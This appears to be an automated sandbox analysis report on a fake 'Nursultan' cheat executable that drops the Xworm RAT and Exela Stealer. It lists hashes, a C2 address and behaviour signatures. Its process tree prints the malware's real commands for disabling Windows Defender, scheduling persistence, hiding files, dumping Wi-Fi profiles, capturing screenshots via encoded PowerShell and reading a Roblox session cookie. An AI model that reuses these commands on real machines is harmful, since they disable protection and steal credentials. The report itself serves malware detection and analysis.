Analysis
-
max time kernel
87s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
30/12/2024, 23:45
General
-
Target
Nursultan.exe
-
Size
18.5MB
-
MD5
0c2f4844e01c34341f0a755ab3b2859e
-
SHA1
ace281f4ebedaf320de215d90fa196f87cf58697
-
SHA256
c34b2138f03116aa6c92db57158c89f03106591653e5cf2bba16b25bd6ee9a7c
-
SHA512
daa8be1529142195ab69f27ec0918e5c98390a503a44b48c280c676d7efa5d6f12644970373edb248559b93672efd5c357e43a1b15d0ba63d9ae3731ae62dfda
-
SSDEEP
393216:IDCj0wdRR8jO7Fi+2Y8DFHCT5rCT8dp2C4wt1MQWJJpVrdh0lfSho:IkkjOr2YkFiTRY8dpF4wt1MJrga
Malware Config
Extracted
xworm
127.0.0.1:40708
under-calculation.gl.at.ply.gg:40708
-
Install_directory
%AppData%
-
install_file
svchost.exe
Signatures
-
Detect Xworm Payload 2 IoCs
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Exelastealer family
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Deletes itself 1 IoCs
-
Drops startup file 2 IoCs
-
Executes dropped EXE 8 IoCs
-
Loads dropped DLL 48 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Service Discovery 1 TTPs 2 IoCs
Attempt to gather information on host's network.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 10 IoCs
-
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
-
UPX packed file 64 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Detects Pyinstaller 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
-
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
-
Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\defender.vbs"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\NursultanClientLauncher.exe"C:\Users\Admin\AppData\Local\Temp\NursultanClientLauncher.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe"C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe"C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe'"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Not Found a File PYTUN.EXE', 0, 'error ', 0+16);close()""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Not Found a File PYTUN.EXE', 0, 'error ', 0+16);close()"5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrackFIX.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqdj2ras\lqdj2ras.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB536.tmp" "c:\Users\Admin\AppData\Local\Temp\lqdj2ras\CSC5DD4953D580C481EBE28F142653DE38B.TMP"7⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
